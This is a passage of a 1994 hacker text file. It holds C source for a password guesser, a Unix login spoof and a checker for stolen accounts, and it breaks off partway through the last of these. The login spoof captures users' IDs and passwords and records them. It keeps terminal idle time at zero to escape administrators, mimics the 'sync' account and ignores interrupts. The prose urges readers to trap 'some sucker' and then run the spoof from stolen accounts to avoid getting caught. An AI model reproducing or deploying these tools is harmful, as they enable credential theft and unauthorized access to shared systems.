|
sprintf(temp, "%c", c);
|
|||
|
strncat(buff, temp, 1);
|
|||
|
}
|
|||
|
else
|
|||
|
flag = 1;
|
|||
|
|
|||
|
|
|||
|
if ((isspace(c)) || (c == ',') != NULL) {
|
|||
|
|
|||
|
if (flag == 1) {
|
|||
|
c=fgetc(fp);
|
|||
|
|
|||
|
if ((isspace(c)) || (iscntrl(c) == NULL))
|
|||
|
ungetc(c, fp);
|
|||
|
}
|
|||
|
|
|||
|
try_word(buff);
|
|||
|
reverse_word(buff);
|
|||
|
strcpy(buff, "");
|
|||
|
flag = 0;
|
|||
|
strcpy(temp, "");
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
fclose(fp);
|
|||
|
remove("gecos");
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* Takes a string of characters as its argument(in this case the login
|
|||
|
i.d., and then reverses it */
|
|||
|
|
|||
|
void reverse_word( char *wd )
|
|||
|
{
|
|||
|
char temp[2], buff[WORDSIZE];
|
|||
|
int i;
|
|||
|
|
|||
|
i = strlen(wd) + 1;
|
|||
|
strcpy(temp, "");
|
|||
|
strcpy(buff, "");
|
|||
|
|
|||
|
do
|
|||
|
{
|
|||
|
i--;
|
|||
|
if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
|
|||
|
sprintf(temp, "%c", wd[i]);
|
|||
|
strncat(buff, temp, 1);
|
|||
|
}
|
|||
|
|
|||
|
} while(i != 0);
|
|||
|
|
|||
|
if (strlen(buff) > 1)
|
|||
|
try_word(buff);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* Read one word at a time from the specified dictionary for use
|
|||
|
as possible passwords, if dictionary filename is NULL, ignore
|
|||
|
this operation */
|
|||
|
|
|||
|
void do_dict( void )
|
|||
|
{
|
|||
|
FILE *fp;
|
|||
|
char buff[WORDSIZE], temp[2];
|
|||
|
int c;
|
|||
|
|
|||
|
strcpy(buff, "");
|
|||
|
strcpy(temp, "");
|
|||
|
|
|||
|
|
|||
|
if (dict == NULL)
|
|||
|
exit(0);
|
|||
|
|
|||
|
if ((fp = fopen(dict, "r")) == NULL) {
|
|||
|
printf("Error opening dictionary file\n");
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
|
|||
|
rewind(fp);
|
|||
|
|
|||
|
|
|||
|
while ((c = fgetc(fp)) != EOF)
|
|||
|
{
|
|||
|
if ((c != ' ') || (c != '\n')) {
|
|||
|
strcpy(temp, "");
|
|||
|
sprintf(temp, "%c", c);
|
|||
|
strncat(buff, temp, 1);
|
|||
|
}
|
|||
|
|
|||
|
if (c == '\n') {
|
|||
|
if (buff[0] != ' ')
|
|||
|
try_word(buff);
|
|||
|
|
|||
|
strcpy(buff, "");
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
fclose(fp);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Process the word to be used as a password by stripping \n from
|
|||
|
it if necessary, then use the pwdauth() function, with the login
|
|||
|
name and word to attempt to get a valid id & password */
|
|||
|
|
|||
|
void try_word( char pw[] )
|
|||
|
{
|
|||
|
int pwstat, i, pwlength;
|
|||
|
char temp[2], buff[WORDSIZE];
|
|||
|
|
|||
|
strcpy(buff, "");
|
|||
|
pwlength = strlen(pw);
|
|||
|
|
|||
|
for (i = 0; i != pwlength; i++)
|
|||
|
{
|
|||
|
|
|||
|
if (pw[i] != '\n') {
|
|||
|
strcpy(temp, "");
|
|||
|
sprintf(temp, "%c", pw[i]);
|
|||
|
strncat(buff, temp, 1);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
if (strlen(buff) > 3 ) {
|
|||
|
printf("Trying : %s\n", buff);
|
|||
|
|
|||
|
if (pwstat = pwdauth(logname, buff) == NULL) {
|
|||
|
printf("Valid Password! - writing details to 'data'\n");
|
|||
|
|
|||
|
write_details(buff);
|
|||
|
|
|||
|
if (strcmp(mode, "f") == NULL)
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* If valid account & password, store this, along with the accounts
|
|||
|
uid, gid, comment, homedir & shell in a file called 'data' */
|
|||
|
|
|||
|
void write_details( char *pw )
|
|||
|
{
|
|||
|
FILE *fp;
|
|||
|
|
|||
|
if ((fp = fopen(OUTFILE, "a")) == NULL) {
|
|||
|
printf("Error opening output file\n");
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
|
|||
|
fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
|
|||
|
fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
|
|||
|
fclose(fp);
|
|||
|
}
|
|||
|
|
|||
|
---cut here-------------------------------------------------------------------
|
|||
|
|
|||
|
again to compile it do :-
|
|||
|
|
|||
|
$ gcc shcrack.c -o shcrack
|
|||
|
|
|||
|
or
|
|||
|
|
|||
|
$ acc shcrack.c -o shcrack
|
|||
|
|
|||
|
this can vary depending on your compiler.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The Ultimate Login Spoof
|
|||
|
^^^^^^^^^^^^^^^^^^^^^^^^
|
|||
|
|
|||
|
Well this subject has been covered many times before but its a while since
|
|||
|
I have seen a good one, and anyway I thought other unix spoofs have had two
|
|||
|
main problems :-
|
|||
|
|
|||
|
1) They were pretty easy to detect when running
|
|||
|
2) They recorded any only shit entered.....
|
|||
|
|
|||
|
|
|||
|
Well now I feel these problems have been solved with the spoof below.
|
|||
|
Firstly, I want to say that no matter how many times spoofing is deemed as
|
|||
|
a 'lame' activity, I think it is very underestimated.
|
|||
|
|
|||
|
|
|||
|
When writing this I have considered every possible feature such a program
|
|||
|
should have. The main ones are :-
|
|||
|
|
|||
|
|
|||
|
1) To validate the entered login i.d. by searching for it in the
|
|||
|
password file.
|
|||
|
|
|||
|
2) Once validated, to get all information about the account entered
|
|||
|
including - real name etc from the comment field, homedir info
|
|||
|
(e.g. /homedir/miner) and the shell the account is using and
|
|||
|
store all this in a file.
|
|||
|
|
|||
|
3) To keep the spoofs tty idle time to 0, thus not to arouse the
|
|||
|
administrators suspicions.
|
|||
|
|
|||
|
4) To validates passwords before storing them, on all unshadowed unix systems
|
|||
|
& SUNOS shadowed/unshadowed systems.
|
|||
|
|
|||
|
5) To emulates the 'sync' dummy account, thus making it act like the
|
|||
|
real login program.
|
|||
|
|
|||
|
6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically
|
|||
|
quit if it has not grabbed an account within a specified time.
|
|||
|
|
|||
|
7) To automatically detect & display the hostname before the login prompt
|
|||
|
e.g. 'ccu login:', this feature can be disabled if desired.
|
|||
|
|
|||
|
8) To run continuously until a valid i.d. & valid password are entered.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
As well as the above features, I also added a few more to make the spoof
|
|||
|
'foolproof'. At university, a lot of the users have been 'stung' by
|
|||
|
login spoofs in the past, and so have become very conscious about security.
|
|||
|
|
|||
|
For example, they now try and get around spoofs by entering any old crap when
|
|||
|
prompted for their login name, or to hit return a few times, to prevent any
|
|||
|
'crappy' spoofs which may be running. This is where my spoof shines!,
|
|||
|
firstly if someone was to enter -
|
|||
|
|
|||
|
login: dhfhfhfhryr
|
|||
|
Password:
|
|||
|
|
|||
|
|
|||
|
into the spoof, it checks to see if the login i.d. entered is
|
|||
|
valid by searching for it in the password file. If it exists, the
|
|||
|
spoof then tries to validate the password. If both the i.d. & password
|
|||
|
are valid, these will be stored in a file called .data, along with
|
|||
|
additional information about the account taken directly from the password
|
|||
|
file.
|
|||
|
|
|||
|
Now if, as in the case above, either the login name or password is
|
|||
|
incorrect, the information is discarded, and the login spoof runs again,
|
|||
|
waiting for a valid user i.d. & password to be entered.
|
|||
|
|
|||
|
Also, a lot of systems these days have an unpassworded account called
|
|||
|
'sync', which when logged onto, usually displays the date & time the
|
|||
|
sync account was last logged into, and from which server or tty,
|
|||
|
the message of the day, syncs the disk, and then logs you straight out.
|
|||
|
|
|||
|
A few people have decided that the best way to dodge login spoofs is to
|
|||
|
first login to this account then when they are automatically logged out,
|
|||
|
to login to their own account.
|
|||
|
|
|||
|
They do this firstly, so that if a spoof is running it only records the
|
|||
|
details of the sync account and secondly the spoof would not act as the
|
|||
|
normal unix login program would, and therefore they would spot it and report
|
|||
|
it, thus landing you in the shit with the system administrator.
|
|||
|
|
|||
|
However, I got around this problem so that when someone
|
|||
|
tries to login as sync (or another account of a similar type, which you can
|
|||
|
define), it acts exactly like the normal login program would, right down to
|
|||
|
displaying the system date & time as well as the message of the day!!
|
|||
|
|
|||
|
|
|||
|
The idle time facility
|
|||
|
----------------------
|
|||
|
|
|||
|
One of the main problems with unix spoofs, is they can be spotted
|
|||
|
so easily by the administrator, as he/she could get a list of current
|
|||
|
users on the system and see that an account was logged on, and had been
|
|||
|
idle for maybe 30 minutes. They would then investigate & the spoof
|
|||
|
would be discovered.
|
|||
|
|
|||
|
I have therefore incorporated a scheme in the spoof whereby
|
|||
|
approx. every minute, the tty the spoof is executed from, is 'touched'
|
|||
|
with the current time, this effectively simulates terminal activity &
|
|||
|
keeps the terminals idle time to zero, which helps the spoofs chances
|
|||
|
of not being discovered greatly.
|
|||
|
|
|||
|
The spoof also incorporates a routine which will automatically
|
|||
|
keep track of approximately how long the spoof has been running, and if
|
|||
|
it has been running for a specified time without grabbing an i.d. or password,
|
|||
|
will automatically exit and run the real login program.
|
|||
|
This timer is by default set to 12.5 minutes, but you can alter this time
|
|||
|
if you wish.
|
|||
|
|
|||
|
Note: Due to the varying processing power of some systems, I could not
|
|||
|
set the timer to exactly 60 seconds, I have therefore set it to 50,
|
|||
|
incase it loses or gains extra time. Take this into consideration when
|
|||
|
setting the spoofs timer to your own value. I recommend you
|
|||
|
stick with the default, and under no circumstances let it run
|
|||
|
for hours.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Password Validation techniques
|
|||
|
------------------------------
|
|||
|
|
|||
|
The spoof basically uses 2 methods of password validation(or none at
|
|||
|
all on a shadowed system V). Firstly, when the spoof is used on any unix
|
|||
|
with an unshadowed password file, it uses the crypt function to validate a
|
|||
|
password entered. If however the system is running SUNOS 4.1.+ and
|
|||
|
incorporates the shadow password system, the program uses a function called
|
|||
|
pwdauth(). This takes the login i.d. & decrypted password as its arguments
|
|||
|
and checks to see if both are valid by encrypting the password and
|
|||
|
comparing it to the shadowed password file which is usually located in
|
|||
|
/etc/security and accessible only by root. By validating both the i.d. &
|
|||
|
password we ensure that the data which is saved to file is correct and not
|
|||
|
any old bullshit typed at the terminal!!!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Executing the Spoof
|
|||
|
-------------------
|
|||
|
|
|||
|
|
|||
|
ok, now about the program. This is written in ANSI-C, so I hope you have a
|
|||
|
compatible compiler, GCC or suns ACC should do it. Now the only time you
|
|||
|
will need to change to the code is in the following circumstances :-
|
|||
|
|
|||
|
1) If you are to compile & run it on an unshadowed unix,
|
|||
|
in which case remove all references to the pwdauth() function,
|
|||
|
from both the declarations & the shadow checking routine, add
|
|||
|
this code in place of the shadow password checking routine :-
|
|||
|
|
|||
|
if ( shadow == 1 ) {
|
|||
|
invalid = 0;
|
|||
|
else
|
|||
|
invalid = 1;
|
|||
|
}
|
|||
|
|
|||
|
2) Add the above code also to the spoof if you are running this on a system
|
|||
|
V which is shadowed. In this case the spoof loses its ability to
|
|||
|
validate the password, to my knowledge there is no sysV equivalent
|
|||
|
of the pwdauth() function.
|
|||
|
|
|||
|
Everything else should be pretty much compatible. You should have no
|
|||
|
problems compiling & running this on an unshadowed SUNOS machine, if
|
|||
|
you do, make the necessary changes as above, but it compiled ok
|
|||
|
on every unshadowed SUNOS I tested it on. The Spoof should
|
|||
|
automatically detect whether a SUNOS system is shadowed or unshadowed
|
|||
|
and run the appropriate code to deal with each situation.
|
|||
|
|
|||
|
Note: when you have compiled this spoof, you MUST 'exec' it from the
|
|||
|
current shell for it to work, you must also only have one shell
|
|||
|
running. e.g. from C or Bourne shell using the GNU C Compiler do :-
|
|||
|
|
|||
|
$ gcc spoof.c -o spoof
|
|||
|
$ exec spoof
|
|||
|
|
|||
|
This replaces the current shell with the spoof, so when the spoof quits &
|
|||
|
runs the real login program, the hackers account is effectively logged off.
|
|||
|
|
|||
|
ok enough of the bullshit, here's the spoof :-
|
|||
|
|
|||
|
|
|||
|
----------cut here-------------------------------------------------------
|
|||
|
|
|||
|
/* Program : Unix login spoof
|
|||
|
Author : The Shining/UPi (UK Division)
|
|||
|
Date : Released 12/4/94
|
|||
|
Unix Type : All unshadowed unix systems &
|
|||
|
shadowed SUNOS systems
|
|||
|
Note : This file MUST be exec'd from the shell. */
|
|||
|
|
|||
|
|
|||
|
#include <stdio.h>
|
|||
|
#include <string.h>
|
|||
|
#include <signal.h>
|
|||
|
#include <pwd.h>
|
|||
|
#include <time.h>
|
|||
|
#include <utime.h>
|
|||
|
|
|||
|
#define OUTFILE ".data" /* Data file to save account info into */
|
|||
|
#define LOGPATH "/usr/bin/login" /* Path of real login program */
|
|||
|
#define DUMMYID "sync" /* Dummy account on your system */
|
|||
|
#define DLENGTH 4 /* Length of dummy account name */
|
|||
|
|
|||
|
|
|||
|
FILE *fp;
|
|||
|
|
|||
|
|
|||
|
/* Set up variables to store system time & date */
|
|||
|
|
|||
|
time_t now;
|
|||
|
|
|||
|
static int time_out, time_on, no_message, loop_cnt;
|
|||
|
|
|||
|
|
|||
|
/* Set up a structure to store users information */
|
|||
|
|
|||
|
struct loginfo {
|
|||
|
char logname[10];
|
|||
|
char key[9];
|
|||
|
char *comment;
|
|||
|
char *homedir;
|
|||
|
char *shell;
|
|||
|
} u;
|
|||
|
|
|||
|
|
|||
|
/* Use the unix function getpass() to read user password and
|
|||
|
crypt() or pwdauth() (remove it below if not SUNOS)
|
|||
|
to validate it etc */
|
|||
|
|
|||
|
char *getpass(), *gethostname(), *alarm(), *sleep(),
|
|||
|
*crypt(), *ttyname(), *pwdauth(), motd, log_date[60],
|
|||
|
pass[14], salt[3], *tty, cons[] = " on console ",
|
|||
|
hname[72], *ld;
|
|||
|
|
|||
|
|
|||
|
/* flag = exit status, ppid = pid shell, wait = pause length,
|
|||
|
pwstat = holds 0 if valid password, shadow holds 1 if shadow
|
|||
|
password system is being used, 0 otherwise. */
|
|||
|
|
|||
|
int flag, ppid, wait, pwstat, shadow, invalid;
|
|||
|
|
|||
|
|
|||
|
/* Declare main functions */
|
|||
|
|
|||
|
void write_details(struct loginfo *);
|
|||
|
void catch( void ), disable_interrupts( void );
|
|||
|
void log_out( void ), get_info( void ),
|
|||
|
invalid_login( void ), prep_str( char * );
|
|||
|
|
|||
|
|
|||
|
/* set up pointer to point to pwfile structure, and also
|
|||
|
a pointer to the utime() structure */
|
|||
|
|
|||
|
|
|||
|
struct passwd *pwentry, *getpwnam();
|
|||
|
struct utimbuf *times;
|
|||
|
|
|||
|
|
|||
|
int main( void )
|
|||
|
{
|
|||
|
system("clear");
|
|||
|
|
|||
|
/* Initialise main program variables to 0, change 'loop_cnt' to 1
|
|||
|
if you do not want the machines host name to appear with
|
|||
|
the login prompt! (e.g. prompt is `login:` instead of
|
|||
|
'MIT login:' etc) */
|
|||
|
|
|||
|
wait = 3; /* Holds value for pause */
|
|||
|
flag = 0; /* Spoof ends if value is 1 */
|
|||
|
loop_cnt = 0; /* Change this to 1 if no host required */
|
|||
|
time_out = 0; /* Stops timer if spoof has been used */
|
|||
|
time_on = 0; /* Holds minutes spoof has been running */
|
|||
|
disable_interrupts(); /* Call function to disable Interrupts */
|
|||
|
|
|||
|
|
|||
|
/* Get system time & date and store in log_date, this is
|
|||
|
displayed when someone logs in as 'sync' */
|
|||
|
|
|||
|
now = time(NULL);
|
|||
|
strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now));
|
|||
|
strcat(log_date, cons);
|
|||
|
ld = log_date;
|
|||
|
|
|||
|
|
|||
|
/* Get Hostname and tty name */
|
|||
|
|
|||
|
gethostname(hname, 64);
|
|||
|
strcat(hname, " login: ");
|
|||
|
tty = ttyname();
|
|||
|
|
|||
|
|
|||
|
/* main routine */
|
|||
|
|
|||
|
while( flag == 0 )
|
|||
|
{
|
|||
|
invalid = 0; /* Holds 1 if id +/or pw are invalid */
|
|||
|
shadow = 0; /* 1 if shadow scheme is in operation */
|
|||
|
no_message = 0; /* Flag for Login Incorrect msg */
|
|||
|
alarm(50); /* set timer going */
|
|||
|
get_info(); /* get user i.d. & password */
|
|||
|
|
|||
|
|
|||
|
/* Check to see if the user i.d. entered is 'sync', if it is
|
|||
|
display system time & date, display message of the day and
|
|||
|
then run the spoof again, insert the account of your
|
|||
|
choice here, if its not sync, but remember to put
|
|||
|
the length of the accounts name next to it! */
|
|||
|
|
|||
|
if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) {
|
|||
|
printf("%s\n", ld);
|
|||
|
|
|||
|
if ((fp = fopen("/etc/motd", "r")) != NULL) {
|
|||
|
while ((motd = getc(fp)) != EOF)
|
|||
|
putchar(motd);
|
|||
|
|
|||
|
fclose(fp);
|
|||
|
}
|
|||
|
|
|||
|
printf("\n");
|
|||
|
prep_str(u.logname);
|
|||
|
no_message = 1;
|
|||
|
sleep(wait);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Check if a valid user i.d. has been input, then check to see if
|
|||
|
the password system is shadowed or unshadowed.
|
|||
|
If both the user i.d. & password are valid, get additional info
|
|||
|
from the password file, and store all info in a file called .data,
|
|||
|
then exit spoof and run real login program */
|
|||
|
|
|||
|
setpwent(); /* Rewind pwfile to beign processing */
|
|||
|
|
|||
|
|
|||
|
if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) {
|
|||
|
invalid = 1;
|
|||
|
flag = 0;
|
|||
|
}
|
|||
|
else
|
|||
|
strncpy(salt, pwentry->pw_passwd, 2);
|
|||
|
|
|||
|
|
|||
|
/* Check for shadowed password system, in SUNOS, the field in /etc/passwd
|
|||
|
should begin with '##', in system V it could contain an 'x', if none
|
|||
|
of these exist, it checks that the entry = 13 chars, if less then
|
|||
|
shadow system will probably be implemented (unless acct has been
|
|||
|
disabled) */
|
|||
|
|
|||
|
if ( invalid == 0 ) {
|
|||
|
|
|||
|
if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL)
|
|||
|
shadow = 1;
|
|||
|
else
|
|||
|
if (strlen(pwentry->pw_passwd) < 13)
|
|||
|
shadow = 1;
|
|||
|
|
|||
|
|
|||
|
/* If unshadowed, use the salt from the pwfile field & the key to
|
|||
|
form the encrypted password which is checked against the entry
|
|||
|
in the password file, if it matches, then all is well, if not,
|
|||
|
spoof runs again!! */
|
|||
|
|
|||
|
if ( shadow != 1 ) {
|
|||
|
|
|||
|
if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL)
|
|||
|
invalid = 0;
|
|||
|
else
|
|||
|
invalid = 1;
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* If SUNOS Shadowing is in operation, use the pwdauth() function
|
|||
|
to validate the password, if not SUNOS, substitute this code
|
|||
|
with the routine I gave earlier! */
|
|||
|
|
|||
|
if ( shadow == 1 ) {
|
|||
|
if (pwstat = pwdauth(u.logname, u.key) == NULL)
|
|||
|
invalid = 0;
|
|||
|
else
|
|||
|
invalid = 1;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* If we have a valid account & password, get user info from the
|
|||
|
pwfile & store it */
|
|||
|
|
|||
|
if ( invalid == 0 ) {
|
|||
|
|
|||
|
u.comment = pwentry->pw_gecos;
|
|||
|
u.homedir = pwentry->pw_dir;
|
|||
|
u.shell = pwentry->pw_shell;
|
|||
|
|
|||
|
/* Open file to store user info */
|
|||
|
|
|||
|
if ((fp = fopen(OUTFILE, "a")) == NULL)
|
|||
|
log_out();
|
|||
|
|
|||
|
write_details(&u);
|
|||
|
fclose(fp);
|
|||
|
no_message = 1;
|
|||
|
flag = 1;
|
|||
|
}
|
|||
|
else
|
|||
|
flag = 0;
|
|||
|
|
|||
|
invalid_login();
|
|||
|
|
|||
|
endpwent(); /* Close pwfile */
|
|||
|
|
|||
|
if (no_message == 0)
|
|||
|
loop_cnt++;
|
|||
|
|
|||
|
} /* end while */
|
|||
|
|
|||
|
log_out(); /* call real login program */
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Function to read user i.d. & password */
|
|||
|
|
|||
|
void get_info( void )
|
|||
|
{
|
|||
|
char user[11];
|
|||
|
unsigned int string_len;
|
|||
|
|
|||
|
fflush(stdin);
|
|||
|
prep_str(u.logname);
|
|||
|
prep_str(u.key);
|
|||
|
strcpy(user, "\n");
|
|||
|
|
|||
|
|
|||
|
/* Loop while some loser keeps hitting return when asked for user
|
|||
|
i.d. and if someone hits CTRL-D to break out of spoof. Enter
|
|||
|
a # at login to exit spoof. Uncomment the appropriate line(s)
|
|||
|
below to customise the spoof to look like your system */
|
|||
|
|
|||
|
while ((strcmp(user, "\n") == NULL) && (!feof(stdin)))
|
|||
|
{
|
|||
|
/* printf("Scorch Ltd SUNOS 4.1.3\n\n); */
|
|||
|
|
|||
|
if (loop_cnt > 0)
|
|||
|
strcpy(hname, "login: ");
|
|||
|
|
|||
|
printf("%s", hname);
|
|||
|
fgets(user, 9, stdin);
|
|||
|
|
|||
|
|
|||
|
/* Back door for hacker, # at present, can be changed,
|
|||
|
but leave \n in. */
|
|||
|
|
|||
|
if (strcmp(user, "#\n") == NULL)
|
|||
|
exit(0);
|
|||
|
|
|||
|
|
|||
|
/* Strip \n from login i.d. */
|
|||
|
|
|||
|
if (strlen(user) < 8)
|
|||
|
string_len = strlen(user) - 1;
|
|||
|
else
|
|||
|
string_len = strlen(user);
|
|||
|
|
|||
|
strncpy(u.logname, user, string_len);
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* check to see if CTRL-D has occurred because it does not
|
|||
|
generate an interrupt like CTRL-C, but instead generates
|
|||
|
an end-of-file on stdin */
|
|||
|
|
|||
|
if (feof(stdin)) {
|
|||
|
clearerr(stdin);
|
|||
|
printf("\n");
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* Turn off screen display & read users password */
|
|||
|
|
|||
|
strncpy(u.key, getpass("Password:"), 8);
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* Function to increment the timer which holds the amount of time
|
|||
|
the spoof has been running */
|
|||
|
|
|||
|
void catch( void )
|
|||
|
{
|
|||
|
time_on++;
|
|||
|
|
|||
|
|
|||
|
/* If spoof has been running for 15 minutes, and has not
|
|||
|
been used, stop timer and call spoof exit routine */
|
|||
|
|
|||
|
if ( time_out == 0 ) {
|
|||
|
if (time_on == 15) {
|
|||
|
printf("\n");
|
|||
|
alarm(0);
|
|||
|
log_out();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* 'Touch' your tty, effectively keeping terminal idle time to 0 */
|
|||
|
|
|||
|
utime(tty, times);
|
|||
|
alarm(50);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* Initialise a string with \0's */
|
|||
|
|
|||
|
void prep_str( char str[] )
|
|||
|
{
|
|||
|
int strl, cnt;
|
|||
|
|
|||
|
strl = strlen(str);
|
|||
|
for (cnt = 0; cnt != strl; cnt++)
|
|||
|
str[cnt] = ' ';
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* function to catch interrupts, CTRL-C & CTRL-Z etc as
|
|||
|
well as the timer signals */
|
|||
|
|
|||
|
void disable_interrupts( void )
|
|||
|
{
|
|||
|
signal(SIGALRM, catch);
|
|||
|
signal(SIGQUIT, SIG_IGN);
|
|||
|
signal(SIGTERM, SIG_IGN);
|
|||
|
signal(SIGINT, SIG_IGN);
|
|||
|
signal(SIGTSTP, SIG_IGN);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Write the users i.d., password, personal information, homedir
|
|||
|
and shell to a file */
|
|||
|
|
|||
|
void write_details(struct loginfo *sptr)
|
|||
|
{
|
|||
|
|
|||
|
fprintf(fp, "%s:%s:", sptr->logname, sptr->key);
|
|||
|
fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid);
|
|||
|
fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir);
|
|||
|
fprintf(fp, "%s\n", sptr->shell);
|
|||
|
fprintf(fp, "\n");
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/* Display login incorrect only if the user hasn't logged on as
|
|||
|
'sync' */
|
|||
|
|
|||
|
void invalid_login( void )
|
|||
|
{
|
|||
|
|
|||
|
if ( flag == 1 && pwstat == 0 )
|
|||
|
sleep(wait);
|
|||
|
|
|||
|
if ( no_message == 0 )
|
|||
|
printf("Login incorrect\n");
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Displays appropriate message, exec's the real login program,
|
|||
|
this replaces the spoof & effectively logs spoof's account off.
|
|||
|
Note: this spoof must be exec'd from the shell to work */
|
|||
|
|
|||
|
void log_out( void )
|
|||
|
{
|
|||
|
time_out = 1;
|
|||
|
|
|||
|
if ( no_message == 1 ) {
|
|||
|
sleep(1);
|
|||
|
printf("Login incorrect\n");
|
|||
|
}
|
|||
|
|
|||
|
execl(LOGPATH, "login", (char *)0);
|
|||
|
}
|
|||
|
|
|||
|
----------cut here-------------------------------------------------------
|
|||
|
|
|||
|
then delete the source, run it and wait for some sucker to login!.
|
|||
|
If you do initially run this spoof from your account, I suggest you
|
|||
|
remove it when you have grabbed someone's account and run it from theirs
|
|||
|
from then on, this reduces your chances of being caught!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
User i.d. & Password Validator
|
|||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|||
|
|
|||
|
Now if you are familiar with the unix Crack program, as I'm sure most of
|
|||
|
you are ;-), or if you have used my spoof to grab some accounts,
|
|||
|
this little program could be of some use. Say you have snagged
|
|||
|
quit a few accounts, and a few weeks later you wanna see if they are still
|
|||
|
alive, instead of logging onto them, then logging out again 20 or 30 times
|
|||
|
which can take time, and could get the system admin looking your way, this
|
|||
|
program will continuously ask you to enter a user i.d. & password, then
|
|||
|
validate them both by actually using the appropriate entry in the password
|
|||
|
file. All valid accounts are then stored along with other info from the
|
|||
|
password file, in a data file. The program loops around until you stop it.
|
|||
|
|
|||
|
This works on all unshadowed unix systems, and, you guessed it!, shadowed
|
|||
|
SUNOS systems.
|
|||
|
|
|||
|
If you run it on an unshadowed unix other than SUNOS, remove all references
|
|||
|
to pwdauth(), along with the shadow password file checking routine,
|
|||
|
if your on sysV, your shit outa luck! anyway, here goes :-
|
|||
|
|
|||
|
|
|||
|
---cut here---------------------------------------------------------------
|
|||
|
|
|||
|
/* Program : To validate accounts & passwords on both
|
|||
|
shadowed & unshadowed unix systems.
|
|||
|
Author : The Shining/UPi (UK Division)
|
|||
|
Date : Released 12/4/94
|
|||
|
UNIX type : All unshadowed systems, and SUNOS shadowed systems */
|
|||
|
|
|||
|
|
|||
|
#include <stdio.h>
|
|||
|
#include <string.h>
|
|||
|
#include <pwd.h>
|
|||
|
|
|||
|
|
|||
|
FILE *fp;
|
|||
|
|
|||
|
|
|||
|
int pw_system( void ), shadowed( void ), unshadowed( void );
|
|||
|
void write_info( void ), display_notice( void );
|
|||
|
|
|||
|
struct passwd *pwentry, *getpwnam();
|
|||
|
|
|||
|
struct user {
|
|||
|
char logname[10];
|
|||
|
char key[9];
|
|||
|
char salt[3];
|
|||
|
} u;
|
|||
|
|
|||
|
|
|||
|
char *getpass(), *pwdauth(), *crypt(), ans[2];
|
|||
|
int invalid_user, stat;
|
|||
|
|
|||
|
|
|||
|
int main( void )
|
|||
|
{
|
|||
|
|
|||
|
strcpy(ans, "y");
|
|||
|
|
|||
|
while (strcmp(ans, "y") == NULL)
|
|||
|
{
|
|||
|
invalid_user = stat = 0;
|
|||
|
display_notice();
|
|||
|
printf("Enter login id:");
|
|||
|
scanf("%9s", u.logname);
|
|||
|
strcpy(u.key, getpass("Password:"));
|
|||
|
|
|||
|
|
|||
|
setpwent();
|
|||
|
|
|||
|
if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL)
|
|||
|
invalid_user = 1;
|
|||
|
else
|
|||
|
strncpy(u.salt, pwentry->pw_passwd, 2);
|
|||
|
|
|||
|
|
|||
|
if (invalid_user != 1) {
|
|||
|
|
|||
|
if ((stat = pw_system()) == 1) {
|
|||
|
if ((stat = unshadowed()) == NULL) {
|
|||
|
printf("Unshadowed valid account! - storing details\n");
|
|||
|
write_info();
|
|||
|
}
|
|||
|
}
|
|||
|
else
|
|||
|
if ((stat = shadowed()) == NULL) {
|
|||
|
printf("SUNOS Shadowed valid account! - storing details\n");
|
|||
|
write_info();
|
|||
|
}
|
|||
|
else
|
|||
|
invalid_user = 2;
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
if (invalid_user == 1)
|
|||
|
printf("User unknown/not found in password file\n");
|
|||
|
|
|||
|
if (invalid_user == 2 )
|
|||
|
printf("Password invalid\n");
|
|||
|
|
|||
|
printf("\n\nValidate another account?(y/n): ");
|
|||
|
scanf("%1s", ans);
|
|||
|
|
|||
|
endpwent();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/* Check to see if shadow password system is used, in SUNOS the field
|
|||
|
in /etc/passwd starts with a '#', if not, check to see if entry
|
|||
|
is 13 chars, if not shadow must be in use. */
|
|||
|
|
|||
|
int pw_system( void )
|
|||
|
{
|
|||
|
if (strlen(pwentry->pw_passwd) != 13)
|
|||
|
return(0);
|
|||
|
else
|
|||
|
